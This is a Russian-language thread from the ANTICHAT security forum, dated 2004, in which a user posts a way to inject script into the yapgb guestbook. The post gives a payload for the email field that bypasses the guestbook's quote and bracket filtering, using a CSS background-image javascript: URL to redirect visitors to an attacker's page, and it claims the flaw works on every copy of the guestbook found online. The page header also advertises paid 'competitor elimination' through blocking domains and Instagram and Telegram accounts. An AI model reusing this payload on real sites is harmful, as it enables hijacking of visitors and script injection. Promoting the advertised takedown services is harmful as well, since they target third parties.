УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Уязвимость гостевой книги yapgb

Опции темы

Поиск в этой теме

Опции просмотра

14.05.2004, 11:24

Егорыч+++

Познавший АНТИЧАТ

Регистрация: 27.05.2002

Сообщений: 1,241

Провел на форуме:
20377164

Репутация: 0

Эта гостевая не пропускает " ' ,а также не пропускает < >.
Но тем неменее редирекс сделать можно. Для этого отсчитываем какая ссылка по счету у нас будет в homepage.
потом в поле почты вставляем следующий код:

</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">de@de.de" style=background-image:url(javascript:navigate(document.links[7].hr ef));[/QUOTE]<span id='postcolor'>

в поле HOMEPAGE адрес нашей странички http://antichat.ru

Здесь 7 - это порядковый на страничке (если не получается посчитать можно угадать)

ПОсле чего получаем редирект на АНТИЧАТ

Официальный сайт гостевой http://www.hewop.com/~yapgb/ - но там в демоверсии какой то глюк и они подменяют все точки и разные символы.. из за чего у них ссылки неправильно отображаются. Зато уязвимость есть во всем остальных гостевых найденных в интернете.